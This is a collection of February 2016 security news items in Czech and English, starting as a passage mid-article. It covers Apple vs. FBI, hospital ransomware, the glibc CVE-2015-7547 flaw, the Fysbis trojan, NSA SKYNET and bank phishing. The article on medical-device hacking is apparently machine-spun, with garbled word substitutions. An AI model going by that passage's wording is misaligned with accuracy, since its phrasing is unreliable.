Obě strany očekávají, že konečný verdikt bude mít rozsáhlé dopady. Apple v boji zřejmě nezůstane sám. Cookovo prohlášení podpořil, zatím jen na Twitteru, i šéf Googlu Sundar Pichai.

Dopady bude mít rozhodnutí jak na oblasti šifrování, vymáhání práva nebo soukromí v digitálním prostředí. Zároveň se ale změny pravděpodobně dočká i víc než 200 let starý americký zákon All Writs Act z roku 1789. Ten dává FBI naději k tomu, aby mohla firmy přinutit k vytváření spywaru a hackovacích programů zaměřených na vlastní uživatele.

Do kauzy už se zapojují i politici, kteří si na tématu přihřívají vlastní popularitu. A používají k tomu univerzální argument posledních měsíců – takzvaný Islámský stát. “Apple bude radši bránit soukromí mrtvých teroristů než bezpečnost Američanů,” komentoval podle serveru The Guardian senátor z Arkansasu Tom Cotton.

Silné obvinění Cook vyvrací. „Nechováme žádné sympatie k teroristům, ale teď po nás americká vláda chce něco, co nemáme, a navíc něco, co je velmi nebezpečné vytvářet. Chtějí po nás backdoor do iPhonů,“ oponuje šéf Applu. Firma silnější zabezpečení do iOS naroubovala v roce 2014. Reagovala tím na pokusy NSA a celou kauzu PRISM.

TIP: Nizozemská vláda prohrála: soukromí lidí je důležitější než hlad po datech

Boj proti terorismu postupně ukrajuje internetové svobody. A to nejen ve Spojených státech. Větší kontrolu digitálního světa už chystají třeba ve Francii, která se loni stala cílem hned dvou velkých teroristických útoků.

Úřady tam chtějí mít v době stavu nouze možnost zakázat volně dostupné WiFi a sdílení připojení. Podle návrhu by také provozovatelé šifrované VoIP komunikace byli povinni poskytnout bezpečnostním složkám šifrovací klíče. Efektivní zadní vrátka pro bezpečnostní složky by ale znamenala i zneužitelnost kýmkoliv dalším.

Snahy o omezení svobody na internetu se objevují i v Česku. Už tento víkend budou proti snahám ministerstva vnitra o snížení anonymity na internetu demonstrovat Piráti na pražském Klárově.


Obama: USA nejsou připraveny na boj kybernetickými hrozbami

18.2.2016 Bezpečnost
Spojené státy nejsou dostatečně připraveny na obranu před kybernetickými hrozbami, ale tento úkol bude z větší části už záležitosti příštího prezidenta. Prohlásil to ve středu prezident Barack Obama na bezpečnostní poradě v Bílém domě.
Prezident před nedávnem rozhodl o zřízení speciální komise pro posílení národní kybernetické bezpečnosti, jejímiž šéfy se stali bývalý poradce Bílého domu pro otázky národní bezpečnosti Tom Donilon a bývalý šéf společnosti IBM Sam Palmisano.

Obama na středeční poradě s oběma experty konstatoval, že internet sice lidem přinesl spoustu příležitostí a bohatství, "mnohé o našich životech je ale stahováno a ukládáno". Otázka kybernetické bezpečnosti je složitá a dlouhodobá záležitost. Úkolem nově zřízené komise bude zajištění bezpečnosti vládních databází a datových úložišť organizací působících v kriticky důležitých sektorech ekonomiky, uvedl prezident.

Donilon a Palmisano mají podle agentury Reuters z Obamova pověření do konce roku předložit návrh na dlouhodobou strategii internetové bezpečnosti USA.
Americká vláda počátkem roku oznámila, že vytváří novou protiteroristickou skupinu, jejímž úkolem bude boj s propagandou Islámského státu a dalších teroristických skupin na internetu. Skupinu budou řídit ministerstva vnitra a spravedlnosti za pomoci ministerstva zahraničí.


Hollywood Hospital Pays $17,000 Ransom to Hacker for Unlocking Medical Records
18.2.2016 Hacking
Ransomware has seriously turned on to a noxious game of Hackers to get paid effortlessly.
Once again the heat was felt by the Los Angeles-based Presbyterian Medical Center when a group of hackers had sealed all its sensitive files and demanded $17,000 USD to regain the access to those compromised data.
The devastation of the compromised files can be pitched as:
Compromised emails
Lockout Electronic Medical Record System [EMR]
Encrypted patient data
Unable to carry CT Scans of the admitted patients
Ferried risky patients to nearby hospitals
...and much more unexplained outcomes.
The hospital had confirmed that the Ransomware malware had hit its core heart a week before, potentially affecting the situation to grow much worse.
Hospital End up Paying $17,000
As the situation was grown out of wild, the hospital paid 40 Bitcoins (Roughly US $17,000) to the Ransomware Criminals to resume their medical operations after gaining the decryption keys.
"The quickest and most efficient way to restore our systems and administrative functions was to pay the ransom and obtain the decryption key," the hospital CEO Allen Stefanek said in a letter.
All the electronic medical system were restored back soon after unlocking the encrypted file locks.
The Ransomware had stolen the nights of many network administrators, as they would be often blamed to fight up this nasty threat; instead of blaming staffs who click the illegit links in their e-mail.
The FBI Advises Victims to Just Pay the Ransom
Last year, even the FBI advised paying off the Ransom amount to the ransomware criminals as they had not come up with any other alternatives.
Several companies had got webbed in the Ransomware business including a US Police Department that paid US $750 to ransomware criminals three years back.
Criminals often demand the ransom in BTC (their intelligent move) for the surety of not getting caught, as Bitcoin transactions are non-trackable due to its decentralized nature.
So until and unless a permanent solution evolves, users are requested not to click malicious or suspected links sent via an unknown person.
The frequent payment to Ransomware encourages the hackers in the dark to stash the cash and develop a more enticing framework for the next target.
But affecting a medical system is a heinous crime as hospitals are acting as a bridge between life and heaven.


Apple vs. FBI — Google Joins Tim Cook in Encryption Backdoor Battle
18.2.2016 Apple
In the escalating battle between the Federal Bureau of Investigation (FBI) and Apple over iPhone encryption, former National Security Agency (NSA) contractor Edward Snowden and Google chief executive Sundar Pichai just sided with Apple's refusal to unlock iPhone.
Yesterday, Apple CEO Tim Cook refused to comply with a federal court order to help the FBI unlock an iPhone owned by one of the terrorists in the mass shootings in San Bernardino, California, in December.
Here's What the FBI is Demanding:
The federal officials have asked Apple to make a less secure version of its iOS that can be used by the officials to brute force the 4-6 digits passcode on the dead shooter's iPhone without getting the device's data self-destructed.
Cook called the court order a "chilling" demand that "would undermine the very freedoms and liberty our government is meant to protect." He argued that to help the FBI unlock the iPhone would basically providing an Encryption Backdoor that would make the products less secure.
Backdoor for Government, Backdoor for All
However, Apple is worried that once this backdoor gets created and handed over to the FBI, there would be chances that the backdoor will likely get into the hands of malicious hackers who could use it for evil purposes.
Although many politicians, including Donald Trump, have slammed Apple's decision, Google has stepped up and taken a public stand in support of Apple's decision.
"I agree 100 percent with the courts," Trump said in a statement. "But to think that Apple won't allow us to get into her cell phone, who do they think they are? No, we have to open it up."
Google Sided with Apple
In a series of tweets late Wednesday, Pichai sided with Apple while saying "forcing companies to enable hacking could compromise users' privacy" and "requiring companies to enable hacking of customer devices & data. Could be a troubling precedent."
However, Pichai took more than 12 hours to talk about this burning issue, after Edward Snowden pointed out that Google had not yet stepped forward to speak up on his stand.
"The @FBI is creating a world where citizens rely on #Apple to defend their rights, rather than the other way around," Snowden tweeted on Wednesday. Snowden called on Google to stand with Apple, saying, "This is the most important tech case in a decade."
Pichai's stance is basically:
The technology companies will give its customers' data to law enforcement when it is required to, but the companies will not put in a "Backdoor" for the government.
While the statements made by Pichai is not quite as forceful as Cook's statement published in an open letter to its customers, we can assume both Google and Apple are together, at least in the sense that the federal agencies are asking too much.


Anonymous leaked 18GB of data belonging to the Turkish national police
18.2.2016 Hacking

Members of the Anonymous group have stolen 18GB worth of data belonging to Turkey’s national police force and leaked it online.
The group of hacktivists Anonymous has just released roughly 18GB of sensitive data belonging to the Turkey’s national police.

The hackers have accessed the database of the Turkish General Directorate of Security (EGM) and leaked the archive on file sharing websites.

Anonymous targeted the Turkish authorities to protest against widespread corruption within the Turkish government.

“Hey Turkey, I have something to show you tomorrow. See, if you fight your citizens, they will bite back. #standby.” states a tweet posted on Sunday by the account @CthulhuSec

anonymous hacked turkish government

The same account shared a link to precious archive a day after the fist tweet, “Enjoy responsibly” stated the message.

anonymous hacked turkish government 2

The link shared points to a page including the links to the archive and the following message:

“I have been asked to release the following files by ROR[RG], who is responsible for collecting them.
The material was taken from the EGM which is the Turkey National Police.
The source has had persistent access to various parts of the Turkish Government infrastructure for the past 2 years and
in light of various government abuses in the past few months, has decided to take action against corruption by releasing this.” reports the page.

The access to the 17.8 GB data requires “some knowledge of databases”:

“As with everything I share, I do not make any claims for the data. However, please note you may require some knowledge
of databases to be able to properly extrapolate information from this data set. If anyone can make a more accessible
version for the less technically inclined, ping it over to me and I will add it here.”

Anonymous already targeted the Turkish Government, in December 2015 it launched a number of cyberattacks on the Turkey’s internet, forcing the nation to shut down thousands of websites.

The Turkish authorities haven’t commented the incident.


Researcher hacks medical devices and the whole hospital with ease
18.2.2016 Hacking

Sergey Lozhkin, a security expert at Kaspersky Lab demonstratd how it is easy for hackers to compromise medical devices and critical healthcare infrastructure.
The ascent in the Internet of Things (IoT) has left gadgets more associated, yet much of the time more vulnerable, than at any other time. From auto hacking to digital assaults against the vitality area, it has never been more essential for producers and IT groups to have a ‘security-first’ disposition.

Yet in spite of a precarious ascent in fruitful hacks, security is regularly disregarded. In a recent study as a feature of the recently held Security Analyst Summit in Spain, Sergey Lozhkin, a senior cyber specialist at security firm Kaspersky Lab, has turned his attention on doctor’s facilities to exhibit how simple it truly is for an online attacker to bargain critical medicinal infrastructure.

“If something goes wrong with medical equipment, if someone hacked a device that helps a doctor to identify an illness, if someone could affect this data a healthy person could be treated as an ill person or the opposite,” He said. “If someone affects the results of for example, MRI, it could be really rough.”, adding further.

In his discussion, Lozhkin laid out how he could hack into the clinic’s system effortlessly – and consent – in the wake of discovering vulnerable restorative gadgets recorded on Shodan.

hacking medical devices

“I decided that this is a critical area and I wanted to research it. I decided to look on the internet, I found the hospital, tested the WiFi network and finally I was able to connect to an MRI device and find personal information and [flaws] in the architecture. It was scary because it was really easy” He explained. “The initial vector was the WiFi network, the network was not really as secure as it should be in such a place where you keep medical data.”

Shodan is a platform used to sweep open ports on the web and is frequently utilized by cyber security researchers to reveal critical infrastructures that ought to be better ensured. In reality, the ‘internet searcher’ nature of Shodan frequently courts’ discussions for connecting to open gadgets such as webcams and, in the latest case, the baby monitors.

“[Shodan] can get some answers concerning the equipment and programming associated [to the internet] and in the event that you know, for instance, what input a MRI or laser or cardiology gadget gives when you interface with its port, you can go to Shodan and discover about several of these gadgets and on the off chance that you know a weakness you can hack every one of them,” the Kaspersky analyst cautioned.

“For this situation it was simple. Therapeutic gadgets are still shaky, I can see it. A few makers truly secure them however some [developers] are pondering web security in second or third place.”

Investigating the eventual fate of IoT, Lozhkin included: “I think lots of people from both sides, the white-hat security researchers and the bad guys, are deeply researching this area – car hacking, connected cars, medical devices, everything. For cyber criminals it could be a big market.”

Most as of late, an inward crisis was announced at a noteworthy US doctor’s facility in Los Angeles taking after an across the board ransomware-style cyberattack that left staff not able to get to fundamental patient information.


Instagram Adds Two-Step Verification to Prevent Account from being Hacked
17.2.2016 Hacking
Hijacking an online account is not a complicated procedure, not at least in 2016.
Today, Instagram confirmed that the company is in the process to roll out two-factor authentication for its 400 Million users.
It is impossible to make your online accounts hack-proof, but you can make them less vulnerable.
Then what you can do to protect yourselves from hackers?
Several companies provide more enhanced steps like Encrypted Channel Services, Security Questions, Strict Password Policy and so on.
But, what would you do if a hacker had somehow managed to access your accounts’ passwords?
Since the online accounts do not have an intelligent agent inbuilt to verify whether the person is the legit driver of the account; beyond a username and password match.
Hence the concept of Two-Factor Authentication (2FA) born out!
Jumbos like Google, Facebook, Twitter and Amazon have already blended the 2FA feature with their services to tackle account hijacking.
2-Factor Authentication or two-step verification is an additional security mechanism that certifies the user is legit after clearing dual identification step i.e. a randomly generated security code would be provided to the user via call/SMS for authentication.
2-Factor Authentication eliminates the hackers to intrude into your online accounts (even if they have your usernames and passwords).
Now, the Multimedia sharing Giant Instagram also joined the league by implementing two-step verification.
Better late than Never:
However, the decision to roll out 2FA feature could be criticized as it's parent company Facebook had already implemented it five years back.
The current users could not expect the new two-step verification feature to get released soon, as the company had mentioned that they would slowly release the phone verification feature.
But yes, there is good news for Singapore Residents. As the first roll would be out for Singaporeans.
Earlier, Instagram hacking was a deja vu as many videos and images of celebrities leaked online in the yesteryears.
Hackers could create havoc such as hijacking or deletion of Instagram Accounts, flooding the account with illegit contents and much more. Taylor Swift was one of such victims of the Instagram hack.
To save yourself from hackers you are recommended to enable 2-Factor Authentication when the Instagram security feature as soon as rolls for your country.


GCHQ helped US in developing Stuxnet, claims a documentary
17.2.2016 BigBrothers

A new documentary titled Zero Days revealed that the Stuxnet cyber weapon was just a small part of a much bigger Information Warfare operation (code named “NITRO ZEUS”) against the Iranian civilian infrastructure.
A new documentary titled Zero Days has revealed more disconcerting news on the Stuxnet worm, the first malware recognized by security industry as a cyber weapon. The documentary sheds light on the US war program that included the design of Stuxnet, it also reveals that hundreds of thousands of network implants and backdoors in Iran networks were managed by Western entities to penetrate Iranian infrastructure and destroy them.

Zero Days presented at the Berlin Film Festival confirms that Stuxnet was developed under the Information warfare operation called “Olympic Games,” which is part of a wider programme dubbed “Nitro Zeus” that involves hundreds of US cyber security experts. The US was not alone, the Israeli Government has a primary role in the Nitro Zeus program.

The documentary confirms that the nation-state hackers behind Stuxnet spent a significant effort in the attempting to covert their operation, they also designed the threat by restricting its operation only against Iranian machines.

Natanz-SCADA Stuxnet

One of the most intriguing novelties proposed in the documentary is the involvement of the GCHQ intelligence, the film sustains that the British intelligence provided information for the development of the four zero-day exploits specifically designed to hit the control systems at the Natanz facility.

The experts at the NSA have hardly worked to cover the tracks after the infection became public, but the author of the report confirmed the existence of a more aggressive version of Stuxnet developed by the Israeli force that went out of control infecting thousands of computers across more than 115 countries.

It is not clear is the GCHQ was informed about the Nitro Zeus program.


Tisíce linuxových programů i celé distribuce nejspíše trpí kritickou chybou
17.2.2016
Zranitelnosti

GNU C Library 2.9 a vyšší (glibc), standardní knihovna jazyka C především na linuxových systémech, trpí posledních osm let kritickou chybou CVE-2015-7547, která umožní spuštění škodlivého kódu. Chyby si nezávisle na sobě všimlo několik specialistů z Red Hatu a Googlu, kteří se s ní pochlubili na svém bezpečnostním blogu.

Inženýři z Googlu narazili na chybu poté, co jejich SSH klient spadl pokaždé, když se pokusil spojit s určitým počítačem v síti. Programátoři si nejprve mysleli, že je problém v jejich programu, postupem času ale přišli na to, že viníkem je přímo glibc a jeho funkce getaddrinfo(), která se stará o DNS překlad doménového jména na IP adresu.

90426727
Test od Googlu a pád aplikace. Systém je děravý (Foto: Kenn White pro Ars Technica)

Určité doménové jméno, případně chování DNS serveru, může při překladu vyvolat přetečení zásobníku (buffer overflow), což povede k chybě typu segmentation fault, které by mohl využít útočník ke spuštění vlastního záškodnického kódu.

Inženýři z Googlu pro tyto případy připravili i test, na kterém lze vyzkoušet, jestli je daný systém náchylný k útoku. Test se skládá z drobného kódu v C, který volá funkci getaddrinfo(), a skriptu v Pythonu, který bude simulovat záškodníka. Zdrojové kódy testu jsou k dispozici na GitHubu. Pokud po spuštění nedojde k pádu aplikace, váš systém je bezpečný.

Potenciálně obrovské riziko

Jelikož je chyba v klíčové knihovně programovacího jazyka C, týká se ohromného množství linuxového softwaru, který byl napsán s využitím glibc 2.9 a vyšší a používá DNS dotazy, což je případ prakticky všech linuxových distribucí, populárních programů wget, curl, sudo, interpretů PHP, Python a tak dále a tak dále.


Dobrá zpráva pro majitele Androidu: Jeho kódy jsou napsané pomocí odnože glibc jménem Bionic a chyba se jej netýká

Oprava chyby může být poměrně složitá. Starší software napsaný pomocí problematické knihovny si totiž nese chybu ve svém vlastním kódu, a pokud jej už nikdo neudržuje, bude napadnutelný i nadále. Zatímco software na linuxových pracovních stanicích a serverech je zpravidla průběžně aktualizovaný, takové síťové krabičky v čele se staršími domácími Wi-Fi routery aj. bez automatické aktualizace se nicméně nyní mohou dostat do hledáčků útočníků, kteří dostali novou zajímavou zbraň. Stačí, abyste na podobně napadnutelném zařízení použili třeba jejich záškodnický DNS server a budou mít hostinu.

Ačkoliv se často vysmíváme Windows a některým chybám, se kterými se museli v Microsoftu vypořádat, jedná se o průběžně aktualizovaný OS. Miliony síťových krabiček s linuxovým jádrem uvnitř, jejichž aktualizace již dávno nikdo neřeší, jsou v případě podobných chyb potenciální cestou do pekel. O to důležitější je, aby nastupující IoT naprosto automaticky předpokládal průběžnou bezpečnostní aktualizaci firmwaru.

Kauza svým potenciálem připomíná chybu Heartbleed z jara roku 2014, která iniciovala lepší financování auditů kódu klíčovéého open-source softwaru. Jeho teoretická bezpečnostní výhoda oproti tomu proprietárnímu totiž skutečně spočívá v tom, že na kód může každý nahlédnout a hledat chyby, důkladná analýza rozsáhlých projektů ovšem vyžaduje čas a zdatné experty, takže nakonec stojí peníze, a proto zase není až takovou samozřejmostí, jak by leckdo pomyslel.


NSA’s Top-Secret SKYNET May Be Killing Thousands of Innocent Civilians
17.2.2016 BigBrothers
NSA’s Top-Secret SKYNET May Be Killing Thousands of Innocent Civilians With Drones
So what do you expect from an Artificially intelligent program run by the government intelligence agency?
Possibly killing innocent people.
The real-life SKYNET, the fictional malevolent artificial intelligence in the Terminator movies, run by the US National Security Agency (NSA) is a surveillance program that uses cell phone metadata to track the GPS location and call activities of suspected terrorists, who may be shot by a Hellfire missile.
Now, a new analysis of previously published NSA documents leaked by former NSA staffer Edward Snowden suggests that many of those people killed based on metadata may have been innocent.
Last year, the leaked documents detailing the NSA's SKYNET programme published by The Intercept showed that NSA had used a machine learning algorithm on the cellular network metadata of 55 Million people in Pakistan to rate each citizen's likelihood of being a terrorist.
You need to know that the US drone bombing campaigns in Pakistan have been raging for years.
Elementary Errors in SKYNET
However, the spy agency has made elementary errors in their machine-learning algorithm, which lead to the generation of thousands of false leads, potentially exposing innocent people to remote assassination by drone.
One of the leaked slides claimed that SKYNET has a false-positive rate of 0.008%, in some cases, and the NSA was using about 55 million people’s phone records for SKYNET.
But, Ars Technica points out that, even at this minute rate, many innocent people are possibly mislabeled. Some of the NSA's tests even saw higher error rates of 0.18%, which means mislabeling nearly 99,000 people out of the 55 Million.
"There are very few 'known terrorists' to use to train and test the model," Patrick Ball, the executive director of Human Rights Data Analysis Group, told the site. "If they are using the same records to train the model as they are using to test the model, their assessment of the fit is completely bullshit."
The purpose SKYNET serves is not clear yet. Although SKYNET could be part of non-violent surveillance programs, like tracking and monitoring suspected terrorists, Ars suggests this technology could potentially be used to target drone strikes.
US Drone Strike Killed Almost 4,000 People
Since 2004, the United States government has carried out hundreds of drone strikes against alleged terrorists in Pakistan and killed somewhere between 2,500 and 4,000 people, the Bureau of Investigative Journalism reported.
The NSA has not yet commented on how the agency used SKYNET, and how the technology was trained.
But Does Killing people "Based on Metadata" actually make sense?
Maybe it is easy to say YES, it makes sense as it happened or is happening far away in a foreign land. But imagine if SKYNET gets turned on us.


Linux Fysbis Trojan, a new weapon in the Pawn Storm’s arsenal
17.2.2016 Virus

Malware researchers at PaloAlto discovered the Fysbis Trojan, a simple and an effective Linux threat used by the Russian cyberspy group Pawn Storm.
Do you remember the Pawn Storm hacking crew? Security experts have identified this group of Russian hackers with several names, including APT28, Sofacy or Sednit, it has been active since at least 2007.

The name Pawn Storm is used by security experts to reference an active economic and political cyber-espionage operation targeting a wide range of entities, most of them belonging to the military, governments, and media industries.

Specific targets include:

Military agencies, embassies, and defense contractors in the US and its allies
Opposition politicians and dissidents of the Russian government
International media
The national security department of a US ally
The Pawn Storm ATP group is considered a high sophisticated threat that has the availability of zero-day exploits in its arsenal. The groups used several strains of malware for the different OS available on the market, including mobile spyware designed to infect Apple iOS devices. One of the principal tools used by the Russian hackers is a Windows backdoor called Sednit.

Now the group is back again targeting Linux systems with a Trojan dubbed Fysbis that is able to compromise targets without requiring highly privileged access. According to the malware researchers at PaloAlto networks, the Fysbis Trojan is a preferred malware used to infect Linux systems despite it isn’t a sophisticated threat.

“The Linux malware Fysbis is a preferred tool of Sofacy, and though it is not particularly sophisticated, Linux security in general is still a maturing area, especially in regards to malware. In short, it is entirely plausible that this tool has contributed to the success of associated attacks by this group. This blog post focuses specifically on this Linux tool preferred by Sofacy and describes considerations and implications when it comes to Linux malware.” the PaloAlto researchers said Friday in a blog post.

sofacy Fysbis trojan

The Fysbis Thojan implements a modular structure, the core components are a set of plugins that could be loaded to add new functionalities to the agent.

“Fysbis is a modular Linux trojan / backdoor that implements plug-in and controller modules as distinct classes. For reference, some vendors categorize this malware under the Sednit attacker group naming designation. This malware includes both 32-bit and 64-bit versions of Executable and Linking Format (ELF) binaries. Additionally, Fysbis can install itself to a victim system with or without root privileges.” continues the analysis published by the PaloAlto Networks.As a

The Fysbis Trojan was designed to exfiltrate potentially sensitive documents and spy on the user’s Web browsing and other activities.

The experts at the PaloAlto Networks’s Unit 42 have observed that APT groups tend to reuse the history command and control infrastructure. The analysis of the Fysbis Trojan samples confirmed this behavior, however in the latest variants the threat actor used also previously unknown servers.

The choice to develop a Linux trojan doesn’t surprise the experts, the Linux OS is preferred platform within data centers, cloud infrastructure for businesses, and application servers. Linux is also the core of Android devices and many other embedded systems. There is also another aspect to consider, many business environments mainly use Windows systems, this means that they are more efficient in detecting Windows threats due to the adoption of specific defense solutions.


Chtějí vybílit lidem účty, používají k tomu Facebook

17.2.2016 Sociální sítě
Klienti České spořitelny by měli být v posledních dnech velmi ostražití. Po phishingových útocích skrze nevyžádané e-maily se počítačoví piráti snaží vyzrát na uživatele této banky také prostřednictvím sociální sítě Facebook. Na té lákají na novou verzi internetového bankovnictví Servis24.
Facebook

Facebook
Nabídka na novou verzi internetového bankovnictví se na Facebooku zobrazuje jako navrhovaný příspěvek, což znamená, že si jej podvodníci zaplatili jednoduše jako reklamu. Uživatelé se tak mohou nechat snadno zmást, protože podobné reklamy se k propagaci služeb skutečně využívají.

Zpráva je navíc psaná česky bez jakýchkoliv chyb. Že jde o phishingový podvod tak pozornější uživatelé mohou poznat jen podle webové adresy, která nesměřuje na skutečnou službu Servis24.

Takto vypadá výzva k použití nového internetového bankovnictví na Facebooku.
Takto vypadá výzva k použití nového internetového bankovnictví na Facebooku.
FOTO: Česká spořitelna

Místo toho se lidé dostanou na web mbanking365.cz. „Útočníci vás prostřednictvím podvodné zprávy přesměrují na falešnou přihlašovací stránku internetového bankovnictví a následně se snaží vylákat vaše přihlašovací údaje,“ varovali zástupci České spořitelny.

S přihlašovacími údaji jsou pak jen krůček od toho, aby mohli lidem vybílit účet. V podstatě jim stačí jen propašovat virus na jejich chytrý telefon, aby mohli odposlouchávat jejich potvrzovací SMS zprávy. Díky tomu budou pak schopni sami realizovat platby.

„Buďte ke zprávám z neznámých zdrojů velmi obezřetní. V žádném případě na zprávu nereagujte ani neklikejte na její obsah, neklikejte ani na odkaz, který je její součástí. Jestliže jste již na odkaz klikli a vyplnili požadované údaje, ihned kontaktujte klientskou linku České spořitelny na bezplatném telefonním čísle 800 207 207,“ doplnili.

Tři útoky za dva týdny
V posledních dvou týdnech jde už o třetí phishingový útok, který je cílen na uživatele České spořitelny. První se útočníci snažili podvodnou stránku lidem podstrčit tak, že jim tvrdili, že na jejich účtu zjistili neobvyklou aktivitu.

Pak zase rozesílali nevyžádané e-maily s tím, že údajně dosáhli maximálního počtu neúspěšných pokusů o přihlášení. Zprovoznit službu Servis24 pak bylo opět možné přihlášením na účet, odkaz ale pochopitelně směřoval opět na podvodnou stránku.


Zjistili jsme neobvyklou aktivitu, tvrdí piráti.
Ukázka nové podvodné zprávy
Dosáhli jste maximálního počtu neúspěšných pokusů o přihlášení, tvrdí kyberzločinci v dalším nevyžádaném e-mailu.


Critical glibc Flaw Puts Linux Machines and Apps at Risk (Patch Immediately)
17.2.2016 Vulnerebility
A highly critical vulnerability has been uncovered in the GNU C Library (glibc), a key component of most Linux distributions, that leaves nearly all Linux machines, thousands of apps and electronic devices vulnerable to hackers that can take full control over them.
Just clicking on a link or connecting to a server can result in remote code execution (RCE), allowing hackers to steal credentials, spy on users, seize control of computers, and many more.
The vulnerability is similar to the last year's GHOST vulnerability (CVE-2015-0235) that left countless machines vulnerable to remote code execution (RCE) attacks, representing a major Internet threat.
GNU C Library (glibc) is a collection of open source code that powers thousands of standalone apps and most Linux distributions, including those distributed to routers and other types of hardware.
The recent flaw, which is indexed as CVE-2015-7547, is a stack-based buffer overflow vulnerability in glibc's DNS client-side resolver that is used to translate human-readable domain names, like google.com, into a network IP address.
The buffer overflow flaw is triggered when the getaddrinfo() library function that performs domain-name lookups is in use, allowing hackers to remotely execute malicious code.
How Does the Flaw Work?
The flaw can be exploited when an affected device or app make queries to a malicious DNS server that returns too much information to a lookup request and floods the program's memory with code.
This code then compromises the vulnerable application or device and tries to take over the control over the whole system.
It is possible to inject the domain name into server log files, which when resolved will trigger remote code execution. An SSH (Secure Shell) client connecting to a server could also be compromised.
However, an attacker need to bypass several operating system security mechanisms – like ASLR and non-executable stack protection – in order to achieve successful RCE attack.
Alternatively, an attacker on your network could perform man-in-the-middle (MitM) attacks and tamper with DNS replies in a view to monitoring and manipulating (injecting payloads of malicious code) data flowing between a vulnerable device and the Internet.
Affected Software and Devices
All versions of glibc after 2.9 are vulnerable. Therefore, any software or application that connects to things on a network or the Internet and uses glibc is at RISK.
The widely used SSH, sudo, and curl utilities are all known to be affected by the buffer overflow bug, and security researchers warn that the list of other affected applications or code is almost too diverse and numerous to enumerate completely.
The vulnerability could extend to a nearly all the major software, including:
Virtually all distributions of Linux.
Programming languages such as the Python, PHP, and Ruby on Rails.
Many others that use Linux code to lookup the numerical IP address of an Internet domain.
Most Bitcoin software is reportedly vulnerable, too.
Who are Not Affected
The good news is users of Google's Android mobile operating system aren't vulnerable to this flaw. As the company uses a glibc substitute known as Bionic that is not susceptible, according to a Google representative.
Additionally, a lot of embedded Linux devices, including home routers and various gadgets, are not affected by the bug because these devices use the uclibc library as it is more lightweight than hefty glibc.
The vulnerability was first introduced in May 2008 but was reported to the glibc maintainers July 2015.
The vulnerability was discovered independently by researchers at Google and Red Hat, who found that the vulnerability has likely not been publicly attacked.
The flaw was discovered when one of the Google's SSH apps experienced a severe error called a segmentation fault each time it attempted to contact to a particular Internet address, Google's security team reported in a blog post published Monday.
Where glibc went Wrong
Google researchers figured out that the error was due to a buffer overflow bug inside the glibc library that made malicious code execution attacks possible. The researchers then notified glibc maintainers.
Here's what went wrong, according to the Google engineers:
"glibc reserves 2048 bytes in the stack through alloca() for the DNS answer at _nss_dns_gethostbyname4_r() for hosting responses to a DNS query. Later on, at send_dg() and send_vc(), if the response is larger than 2048 bytes, a new buffer is allocated from the heap and all the information (buffer pointer, new buffer size and response size) is updated."
"Under certain conditions a mismatch between the stack buffer and the new heap allocation will happen. The final effect is that the stack buffer will be used to store the DNS response, even though the response is larger than the stack buffer and a heap buffer was allocated. This behavior leads to the stack buffer overflow."
Proof-of-Concept Exploit Released
Google bod Fermin J. Serna released a Proof-of-Concept (POC) exploit code on Tuesday.
With this POC code, you can verify if you are affected by this critical issue, and verify any mitigations you may wish to enact.
Patch glibc Vulnerability
Google researchers, working with security researchers at Red Hat, have released a patch to fix the programming blunder.
However, it is now up to the community behind the Linux OS and manufacturers, to roll out the patch to their affected software and devices as soon as possible.
For people running servers, fixing the issue will be a simple process of downloading and installing the patch update.
But for other users, patching the problem may not be so easy. The apps compiled with a vulnerable glibc version should be recompiled with an updated version – a process that will take time as users of affected apps have to wait for updates to become available from developers.
Meanwhile, you can help prevent exploitation of the flaw, if you aren’t able to immediately patch your instance of glibc, by limiting all TCP DNS replies to 1024 bytes, and dropping UDP DNS packets larger than 512 bytes.
For more in-depth information on the glibc flaw, you can read Red Hat blog post.